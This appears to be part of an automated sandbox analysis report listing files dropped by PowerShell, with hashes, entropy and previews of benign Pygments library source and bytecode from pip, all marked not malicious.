                                                                                                    Preview:........=.Cfb/..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d...Z.g.d.....e.e.........z.....e.e.........z...Z.i.Z.i.Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d.d...Z.d...Z d...Z!..G.d...d.e.jD..........................Z#e.jH..................e%....Z&..e#e%........Z'e'jP..................jS..................e&jP............................e'e.jH..................e%<...e'`'e'`&e'`.e'`.y.).z.. pygments.lexers. ~~~~~~~~~~~~~~~.. Pygments lexers... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...basename)...LEXERS)...get_filetype_from_buffer)...find_plugin_lexers)...ClassNotFound..guess_decode..PythonLexer..PythonTracebackLexer)...Python3Lexer..Python3TracebackLexer)...get_lexer_by_name..get_lexer_for_filename..find_lexer_class..guess_lexer..load_lexer_from_filec...........................|.t.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64415
                                                                                                    Entropy (8bit):5.981118177293901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bAeiyMKm3ySJGP+ZPQ7MfIqdNXPxxL9yVASYNIoggZl/8rz7XMKTXSWg2k6fvMPP:bbVE3ywGp+PWD/rsKTgBWMdJv
                                                                                                    MD5:F22765DBAF4BCE7C6B27417554F6BB1B
                                                                                                    SHA1:8D1FF9C5D822A6F7CDF5511A37095F4A45930DF5
                                                                                                    SHA-256:4C2C886910E806B3CD3C885E15120FE74FE0F1C6830C56CF05C8FA934C0D158E
                                                                                                    SHA-512:05BD09A94B2E29AF612591465E9982DD7036590F232909B0C93E26E933C89DB97C97FFAE9ECB17671179BA2BBBEAE8F673D5B3B53A56CA61D7F7F54F9C812F06
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfY...............................i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....i.dDdE..dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde....i.dfdg..dhdi..djdk..dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d...d.d...d.d...d.d...d.d...d.d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....i...d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):42650
                                                                                                    Entropy (8bit):5.891979555836276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:cqDydI7noECe//hA4tj5O4qAFsSXnekabgCLku2umqo+wUglZn:cqDydIroze//e4qAsSXnKbgCLk0No+UZ
                                                                                                    MD5:545E25DF2DDA9CB96F073D31FCE63B38
                                                                                                    SHA1:D0880D08D80B167B41CE43D16C0597F265479E9F
                                                                                                    SHA-256:CF84D7627BF44AD566278270EDB0BF0DAA6A63A74713FFF6393142C645749C79
                                                                                                    SHA-512:260E3465A446B4DB0024659AB5094AC22789E4BB396A9EEE8A3E3EAF69B6977A02024CCAB45408DC7FD34026467BA3CE3B835D9F60CAF39865D4B101C71E34B9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................z.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z"..g.d...Z#..G.d...d.e.........Z$e$Z%..G.d...d.e.........Z&..G.d...d.e.........Z'..G.d...d.e.........Z(..G.d...d.e.........Z)e)Z*..G.d...d.e.........Z+..G.d...d.e.........Z,..G.d...d.e.........Z-..G.d...d.e$........Z.y.).z.. pygments.lexers.python. ~~~~~~~~~~~~~~~~~~~~~~.. Lexers for Python and related languages... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...DelegatingLexer..Lexer..RegexLexer..include..bygroups..using..default..words..combined..do_insertions..this..line_re)...get_bool_opt..shebang_matches)...Text..Comment..Operator..Keyword..Name..String..Number..Punctuation..Generic..Other..Error..Whitespace)...unistring)...PythonLexer..PythonConsoleLexer..PythonTracebackLexer..Python2Lexer..Python2T
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (371)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72281
                                                                                                    Entropy (8bit):4.940249409955633
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:9Rrzm8jB8WD/b8Wqu9Pf/EiNdfMGoMCtzeaxoNgBUE8:n59H/LjoMKzeaxQgBUf
                                                                                                    MD5:54CC01AC45B6392658DFC66616D6956F
                                                                                                    SHA1:ED7FE41CE6FE8446D6C4DDF9A230CD1CC2861B2C
                                                                                                    SHA-256:1EDB38AFF650F2271FB4633B82404F7840F9972552BF869F7C5817604E80A74E
                                                                                                    SHA-512:165A8816E6804053635CBEF59CCB1410E84D99041FE5EA026728E693B77F839DE03799EB20E67BCBEA9FF0B6036E1A8495F2689AD20D30B208E307FBF5880405
                                                                                                    Malicious:false
                                                                                                    Preview:# Automatically generated by scripts/gen_mapfiles.py..# DO NOT EDIT BY HAND; run `tox -e mapfiles` instead...LEXERS = {. 'ABAPLexer': ('pip._vendor.pygments.lexers.business', 'ABAP', ('abap',), ('*.abap', '*.ABAP'), ('text/x-abap',)),. 'AMDGPULexer': ('pip._vendor.pygments.lexers.amdgpu', 'AMDGPU', ('amdgpu',), ('*.isa',), ()),. 'APLLexer': ('pip._vendor.pygments.lexers.apl', 'APL', ('apl',), ('*.apl', '*.aplf', '*.aplo', '*.apln', '*.aplc', '*.apli', '*.dyalog'), ()),. 'AbnfLexer': ('pip._vendor.pygments.lexers.grammar_notation', 'ABNF', ('abnf',), ('*.abnf',), ('text/x-abnf',)),. 'ActionScript3Lexer': ('pip._vendor.pygments.lexers.actionscript', 'ActionScript 3', ('actionscript3', 'as3'), ('*.as',), ('application/x-actionscript3', 'text/x-actionscript3', 'text/actionscript3')),. 'ActionScriptLexer': ('pip._vendor.pygments.lexers.actionscript', 'ActionScript', ('actionscript', 'as'), ('*.as',), ('application/x-actionscript', 'text/x-actionscript', 'text/actionscript'
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53424
                                                                                                    Entropy (8bit):4.641604482748351
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:2wdxZ60UuYZO/o45VqLkddHZ6L+p8HUWpqLHPtNOfj1AGSvM:3hUuYZOF5VqiK+p83q8AM
                                                                                                    MD5:AB99BADC8C34B2ADC7F7F12888A3A0F9
                                                                                                    SHA1:8CAC7E5D493ED6185EEC6C8B1628109F888F28C1
                                                                                                    SHA-256:73B8E798A154F432F14C95B451BC17B7A67D149A9B06556C580D50AFDC5203FC
                                                                                                    SHA-512:883CB64AAC1D0DAFACD1FC7A88DF310E4AF05192979A527B7DA7A162CE555CF41CC9DDF761E34BD706EB951DE7791506FDD4B85296BF731B935A93B2DDB4FBD6
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.lexers.python. ~~~~~~~~~~~~~~~~~~~~~~.. Lexers for Python and related languages... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import keyword..from pip._vendor.pygments.lexer import DelegatingLexer, Lexer, RegexLexer, include, \. bygroups, using, default, words, combined, do_insertions, this, line_re.from pip._vendor.pygments.util import get_bool_opt, shebang_matches.from pip._vendor.pygments.token import Text, Comment, Operator, Keyword, Name, String, \. Number, Punctuation, Generic, Other, Error, Whitespace.from pip._vendor.pygments import unistring as uni..__all__ = ['PythonLexer', 'PythonConsoleLexer', 'PythonTracebackLexer',. 'Python2Lexer', 'Python2TracebackLexer',. 'CythonLexer', 'DgLexer', 'NumPyLexer']...class PythonLexer(RegexLexer):. """. For Python source code (version 3.x)... .. versionadded:: 0.10.. .. versionchanged:: 2.5.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):986
                                                                                                    Entropy (8bit):4.678227732447655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Yx/GAoh8vJgdj8/7Yd2TOR81a3/TFGNXu:Yx/G4vI3NR8O/Twu
                                                                                                    MD5:D3E1EE4B236E922D813DDAEB2D7C41FA
                                                                                                    SHA1:5DD98A164720F0A9E9009C4F6496E4C712C25EFC
                                                                                                    SHA-256:785DAF3B82E9386A0FBC828A91B3DF9F2BADF214F852279B64FA5BF8160641D2
                                                                                                    SHA-512:07E8C333AD40BFF9667C917B5A0BA7E379D4589DFD7940E7CD39D841DD8506DBCEB86A1B52DDECE03F34A5420252B9EFAFA827EDEDA0FCF7D3721C4AF7342435
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.modeline. ~~~~~~~~~~~~~~~~~.. A simple modeline parser (based on pymodeline)... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re..__all__ = ['get_filetype_from_buffer']...modeline_re = re.compile(r'''. (?: vi | vim | ex ) (?: [<=>]? \d* )? :. .* (?: ft | filetype | syn | syntax ) = ( [^:\s]+ ).''', re.VERBOSE)...def get_filetype_from_line(l):. m = modeline_re.search(l). if m:. return m.group(1)...def get_filetype_from_buffer(buf, max_lines=5):. """. Scan the buffer for modelines and return filetype if one is found.. """. lines = buf.splitlines(). for l in lines[-1:-max_lines-1:-1]:. ret = get_filetype_from_line(l). if ret:. return ret. for i in range(max_lines, -1, -1):. if i < len(lines):. ret = get_filetype_from_line(lines[i]). if ret:. return ret.. return None.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2591
                                                                                                    Entropy (8bit):4.726117618854269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:YhRbZ6mQ4Aa4vRpmCgVVGs+LzXLXc2cKAbWQukkTWmB/OvvKvkAE:YhRbZ6rNLvOCWVH+Lz7Xrkb1doNB/OH1
                                                                                                    MD5:4EE97EFA46A09BC0DB7804732A21E6A7
                                                                                                    SHA1:A228E13247816E21675FB132A0FC79F983565F9C
                                                                                                    SHA-256:8F5161DF5D116D5D8343D9EF92692ABE58F7F20772B982A594B9C6C5B73CB093
                                                                                                    SHA-512:4701DC530F1EA8D8B50A3E6BA34C75F67B120D5AE7A40662F303BB6C42636BDBF4A2CB1F7F3FEFB087EE92685FE4F6E8B9F5E95EE6CEAB20BE515C09E99B61EE
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.plugin. ~~~~~~~~~~~~~~~.. Pygments plugin interface. By default, this tries to use. ``importlib.metadata``, which is in the Python standard. library since Python 3.8, or its ``importlib_metadata``. backport for earlier versions of Python. It falls back on. ``pkg_resources`` if not found. Finally, if ``pkg_resources``. is not found either, no plugins are loaded at all... lexer plugins::.. [pygments.lexers]. yourlexer = yourmodule:YourLexer.. formatter plugins::.. [pygments.formatters]. yourformatter = yourformatter:YourFormatter. /.ext = yourformatter:YourFormatter.. As you can see, you can define extensions for the formatter. with a leading slash... syntax plugins::.. [pygments.styles]. yourstyle = yourstyle:YourStyle.. filter plugin::.. [pygments.filter]. yourfilter = yourfilter:YourFilter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :l
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):4.501618524220782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:YeG4aXu83xvydcb7cttfb8HZ/W1X1orYrdhNc/tJB7EghskXCch19MMhvugBu6j:YeHal3xvyuGQ5AXV8AuvHjNcc
                                                                                                    MD5:6D8F778A626089EE1F3324EFFE8C3139
                                                                                                    SHA1:495022FA953387139FBD39FA16586D6FDDE7CA2D
                                                                                                    SHA-256:8E0D402E881C60653DE93412F62B0197A742AEFC39CB9FBE04FFCAFAE164FFCB
                                                                                                    SHA-512:7E039FF20E146755041EB572156440F2BB5E1DBAE6E99DC12F1C8F80C070B9D48995EC30DF40FDE59929694876F7FF24DE67096CBD4515B0EF2E301A73B31729
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.regexopt. ~~~~~~~~~~~~~~~~~.. An algorithm that generates optimized regexes for matching long lists of. literal strings... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.from re import escape.from os.path import commonprefix.from itertools import groupby.from operator import itemgetter..CS_ESCAPE = re.compile(r'[\[\^\\\-\]]').FIRST_ELEMENT = itemgetter(0)...def make_charset(letters):. return '[' + CS_ESCAPE.sub(lambda m: '\\' + m.group(), ''.join(letters)) + ']'...def regex_opt_inner(strings, open_paren):. """Return a regex that matches any string in the sorted list of strings.""". close_paren = open_paren and ')' or ''. # print strings, repr(open_paren). if not strings:. # print '-> nothing left'. return ''. first = strings[0]. if len(strings) == 1:. # print '-> only 1 string'. return open_paren + escape(first) + close_paren. i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3092
                                                                                                    Entropy (8bit):4.332795149986856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YEit5Ec3S39ich97fOMMbGgrcG4NPcwYMobHKS:Xit3C39iU7sLrJePvaHKS
                                                                                                    MD5:9C0E01E94CCC6829A47A1CA12327EC20
                                                                                                    SHA1:C1EDC8470764067799D4AC97E13BC0C088456526
                                                                                                    SHA-256:6FF9EEE7F7F71C2812769E52FDA351050D4C4829B86630F079CD8E993462724C
                                                                                                    SHA-512:C9AB0F787EFEE674D1FA8A6B87CA996E54FB9CC494D45B61BD12C266A760BCBF0399B5A9D666AE044F087E8FDD21C45EE9BA59465C1286DF27F9E69376BFE3E8
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.scanner. ~~~~~~~~~~~~~~~~.. This library implements a regex based scanner. Some languages. like Pascal are easy to parse but have some keywords that. depend on the context. Because of this it's impossible to lex. that just by using a regular expression lexer like the. `RegexLexer`... Have a look at the `DelphiLexer` to get an idea of how to use. this scanner... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..""".import re...class EndOfText(RuntimeError):. """. Raise if end of text is reached and the user. tried to call a match function.. """...class Scanner:. """. Simple scanner.. All method patterns are regular expression strings (not. compiled expressions!). """.. def __init__(self, text, flags=0):. """. :param text: The text which should be scanned. :param flags: default regular expression flags. """. self.da
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6882
                                                                                                    Entropy (8bit):4.501142767387457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Y8HHCiYBsfeyCqEaXMTCksxrf/kOiD3RcRM1J9nEJITTZc82geqLxXV+:R9YB5y5EzahkOv+Txk
                                                                                                    MD5:829572F07739757E94EE77937738BCAA
                                                                                                    SHA1:33DD28B3E9AD132BDD7061FE54E4974D0822BA3E
                                                                                                    SHA-256:C011589B5F34A9E6BD24AB7FFD4CE14653513617333C31436AA183DB5B1BBACA
                                                                                                    SHA-512:9ACA4C1B20790D7EA6DBBCD40D1F304BD4355387703AF88847BC4D4DC409F37C3B40C6B65E9C87596A30D3522A4A341C4E8DBCC1BF71A560A4A6152E716E24ED
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.sphinxext. ~~~~~~~~~~~~~~~~~~.. Sphinx extension to generate automatic documentation of lexers,. formatters and filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import sys..from docutils import nodes.from docutils.statemachine import ViewList.from docutils.parsers.rst import Directive.from sphinx.util.nodes import nested_parse_with_titles...MODULEDOC = '''... module:: %s..%s.%s.'''..LEXERDOC = '''... class:: %s.. :Short names: %s. :Filenames: %s. :MIME types: %s.. %s..'''..FMTERDOC = '''... class:: %s.. :Short names: %s. :Filenames: %s.. %s..'''..FILTERDOC = '''... class:: %s.. :Name: %s.. %s..'''...class PygmentsDoc(Directive):. """. A directive to collect all lexers/formatters/filters and generate. autoclass directives for them.. """. has_content = False. required_arguments = 1. optional_arguments = 0. final_argument_whitespa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6257
                                                                                                    Entropy (8bit):4.24089828992328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ytjbx1ewk5pZCCYbVXHCVBbm7TjV63vmZ7RwTWwzOfppGK/l+5bmhpzNHzM7VC40:sTyKmxuTjV63vmZlcy/UYDNyk
                                                                                                    MD5:A05E45FDA259362F1407D294CDB11BC6
                                                                                                    SHA1:D48162A00E73B97C0480333914810D5F98F61A03
                                                                                                    SHA-256:0B8AB2A09AD44E4ABE395DE23BEF15CF752D598A49C124DD879FEF94608674D4
                                                                                                    SHA-512:F06CD361E396E0828205FF33EF242162652A10C6EBBD45DB0D50C089BC93B53CFA9C0117FEEA495AABE97176EEEC9C8C146B950F5037B2574AE7A27761AE2008
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.style. ~~~~~~~~~~~~~~.. Basic style object... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.token import Token, STANDARD_TYPES..# Default mapping of ansixxx to RGB colors.._ansimap = {. # dark. 'ansiblack': '000000',. 'ansired': '7f0000',. 'ansigreen': '007f00',. 'ansiyellow': '7f7fe0',. 'ansiblue': '00007f',. 'ansimagenta': '7f007f',. 'ansicyan': '007f7f',. 'ansigray': 'e5e5e5',. # normal. 'ansibrightblack': '555555',. 'ansibrightred': 'ff0000',. 'ansibrightgreen': '00ff00',. 'ansibrightyellow': 'ffff00',. 'ansibrightblue': '0000ff',. 'ansibrightmagenta': 'ff00ff',. 'ansibrightcyan': '00ffff',. 'ansiwhite': 'ffffff',.}.# mapping of deprecated #ansixxx colors to new color names._deprecated_ansicolors = {. # dark. '#ansiblack': 'ansiblack',. '#ansidarkred': 'ansired',. '#ansidarkgreen': 'ansigreen',.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3700
                                                                                                    Entropy (8bit):4.765716195149535
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YhhjaTBfCtchGEhZAcX/rPesS9eRqjOEJ2zg:lB6tchJHPCeg
                                                                                                    MD5:504FC26BC1867F96329F33FF849E7119
                                                                                                    SHA1:76A719FB4C7EF7B5C52EDF2F31A33824CB21B803
                                                                                                    SHA-256:85EEC78D0C7BB02D1DDA47D354B8D4B34275E66B53A0933A3356EBC089BDFBE4
                                                                                                    SHA-512:FDE51769F61E116E83FC2766C44BA72AECEE013CBE8473546F169C199E0B4207FA11F52144C38CD33CE60B8068E14A89102B01A17BCC4BA3ADDAC0F706D7ADA7
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.styles. ~~~~~~~~~~~~~~~.. Contains built-in styles... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.plugin import find_plugin_styles.from pip._vendor.pygments.util import ClassNotFound..#: A dictionary of built-in styles, mapping style names to.#: ``'submodule::classname'`` strings..STYLE_MAP = {. 'default': 'default::DefaultStyle',. 'emacs': 'emacs::EmacsStyle',. 'friendly': 'friendly::FriendlyStyle',. 'friendly_grayscale': 'friendly_grayscale::FriendlyGrayscaleStyle',. 'colorful': 'colorful::ColorfulStyle',. 'autumn': 'autumn::AutumnStyle',. 'murphy': 'murphy::MurphyStyle',. 'manni': 'manni::ManniStyle',. 'material': 'material::MaterialStyle',. 'monokai': 'monokai::MonokaiStyle',. 'perldoc': 'perldoc::PerldocStyle',. 'pastie': 'pastie::PastieStyle',. 'borland': 'borland::BorlandStyle',. 'trac': 'trac::T
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4459
                                                                                                    Entropy (8bit):6.045681730876615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CKhhyNZAZwvXRzSB61/OBdh4qDnpPjOd+1GrUZAHfim:wNKZwvXde6oBdhOAZQim
                                                                                                    MD5:63ACEF7448BBFDAE5D61FAE5C6D5AF7E
                                                                                                    SHA1:486F91A04F1B35AADF5FC87E42C76B2C8B6EC772
                                                                                                    SHA-256:11F6E28655284752F950962FDE5DD955B46D5937801D927ADD4A856F2354956A
                                                                                                    SHA-512:193E57581931C87DBDC78C569ED7FCABD073085D4AE9AC8E9A326FE1AA8D81B2F335DBE07FBB871435195FD94676AB8B93E02BEAFCE007C1DF854CAA3164E82B
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cft.........................".....d.Z.d.d.l.m.Z...d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..d$d%..i.d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG....dHdIdIdJdKdLdMdNdOdPdQdRdSdTdU....Z.dV..Z.dW..Z.yX)Yz.. pygments.styles. ~~~~~~~~~~~~~~~.. Contains built-in styles... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...find_plugin_styles)...ClassNotFound..defaultz.default::DefaultStyle..emacsz.emacs::EmacsStyle..friendlyz.friendly::FriendlyStyle..friendly_grayscalez*friendly_grayscale::FriendlyGrayscaleStyle..colorfulz.colorful::ColorfulStyle..autumnz.autumn::AutumnStyle..murphyz.murphy::MurphyStyle..manniz.manni::ManniStyle..materialz.material::MaterialStyle..monokaiz.monokai::MonokaiStyle..perldocz.perldoc::PerldocStyle..pastiez.pastie::PastieStyle..borlandz.borland::BorlandS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6184
                                                                                                    Entropy (8bit):4.104488169596893
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YYlvDjqgwTGiDBdEnE2cwdOEr8gewUVbNrv8ikM4q8wrwTKMBG0Y0ML6viXy6cBd:JZw6PE2cwdzuGGL6V
                                                                                                    MD5:B5268388890E89F2C2B1979520D938AB
                                                                                                    SHA1:6F402016A74D090B88CC9BBEE0405F42443BFC05
                                                                                                    SHA-256:B1E36C99C721F4E1075D88AB87C3A897BC3CC4385F3536CB8F9AC7002FA073FA
                                                                                                    SHA-512:898B6980918C040D54E858C9CC2B51C417CDAFAD48E2FEFEB4142907CFC12D7AC6655E8B8BFFC1A9FDD2B3162DF8B87D26E6BAB051AE0BE3A0A25C1EED2C8DF0
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.token. ~~~~~~~~~~~~~~.. Basic token types and the standard tokens... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""...class _TokenType(tuple):. parent = None.. def split(self):. buf = []. node = self. while node is not None:. buf.append(node). node = node.parent. buf.reverse(). return buf.. def __init__(self, *args):. # no need to call super.__init__. self.subtypes = set().. def __contains__(self, val):. return self is val or (. type(val) is self.__class__ and. val[:len(self)] == self. ).. def __getattr__(self, val):. if not val or not val[0].isupper():. return tuple.__getattribute__(self, val). new = _TokenType(self + (val,)). setattr(self, val, new). self.subtypes.add(new). new.parent = self. return new.. def __repr_
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with very long lines (10457)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63223
                                                                                                    Entropy (8bit):4.139122109033449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Tr/qYI7ziJJ7MFjasklc2CqQiKlvCuybmiZVoFD7TimSFqcaJPhCgQTyM7r2PTbK:HiYI7ziH7RyqQWuP9TWzaVhCt+33pZb6
                                                                                                    MD5:A3BBB41C5DD21FC0235A7ED7AE80D3BB
                                                                                                    SHA1:4A4A8A85179B27A74B15D7150730C10DD789B1B7
                                                                                                    SHA-256:15A51F1B5E0D04910A2D0A18F6A8FA258797AE961C2E62AE96085DC4E18568E7
                                                                                                    SHA-512:71BA17D0DDC6815A35FCBDA2BA3B99560F50795327C29CF7D555AB96FBE4EFCBE8213F5774FE100D8982ABDD84F619C27CCF40CB55D494E9E36CA7E287559324
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.unistring. ~~~~~~~~~~~~~~~~~~.. Strings of all Unicode characters of a certain category.. Used for matching in Unicode-aware languages. Run to regenerate... Inspired by chartypes_create.py from the MoinMoin project... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..Cc = '\x00-\x1f\x7f-\x9f'..Cf = '\xad\u0600-\u0605\u061c\u06dd\u070f\u08e2\u180e\u200b-\u200f\u202a-\u202e\u2060-\u2064\u2066-\u206f\ufeff\ufff9-\ufffb\U000110bd\U000110cd\U0001bca0-\U0001bca3\U0001d173-\U0001d17a\U000e0001\U000e0020-\U000e007f'..Cn = '\u0378-\u0379\u0380-\u0383\u038b\u038d\u03a2\u0530\u0557-\u0558\u058b-\u058c\u0590\u05c8-\u05cf\u05eb-\u05ee\u05f5-\u05ff\u061d\u070e\u074b-\u074c\u07b2-\u07bf\u07fb-\u07fc\u082e-\u082f\u083f\u085c-\u085d\u085f\u086b-\u089f\u08b5\u08be-\u08d2\u0984\u098d-\u098e\u0991-\u0992\u09a9\u09b1\u09b3-\u09b5\u09ba-\u09bb\u09c5-\u09c6\u09c9-\u09ca\u09cf-\u09d6\u09d8-\u09db\u09de\u09e4-\u09
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10230
                                                                                                    Entropy (8bit):4.673119780722134
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6aZUBSPTM96yiA3T1jWthar2zSUU8dAvqIAp+NlaG7hEwA:3ZrTm3BOzRdAvqmeG7u7
                                                                                                    MD5:1C23AD75B86808830E887C883470BBBA
                                                                                                    SHA1:2D7CA5A0F7D31ECB4EBE340F3649FD149F7726EC
                                                                                                    SHA-256:004558D2AA27CB210C82FE03A3674836BAEA500C149365D84AA1CCEB9D2ECDE9
                                                                                                    SHA-512:B7E42E7CEA62D75022B77403BBBF403AD796136795D86612660EE28271DBDA3785F627868CFF49C91279DDC0B13E6D8ADA8CDD69B24907B0F30928352B8352C2
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.util. ~~~~~~~~~~~~~.. Utility functions... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.from io import TextIOWrapper...split_path_re = re.compile(r'[/\\ ]').doctype_lookup_re = re.compile(r'''. <!DOCTYPE\s+(. [a-zA-Z_][a-zA-Z0-9]*. (?: \s+ # optional in HTML5. [a-zA-Z_][a-zA-Z0-9]*\s+. "[^"]*")?. ). [^>]*>.''', re.DOTALL | re.MULTILINE | re.VERBOSE).tag_re = re.compile(r'<(.+?)(\s.*?)?>.*?</.+?>',. re.IGNORECASE | re.DOTALL | re.MULTILINE).xml_decl_re = re.compile(r'\s*<\?xml[^>]*\?>', re.I)...class ClassNotFound(ValueError):. """Raised if one of the lookup functions didn't find a matching class."""...class OptionError(Exception):. """. This exception will be raised by all option processing functions if. the type or value of the argument is not correct.. """..def get_choice_opt(options, optname, allowed, default=Non
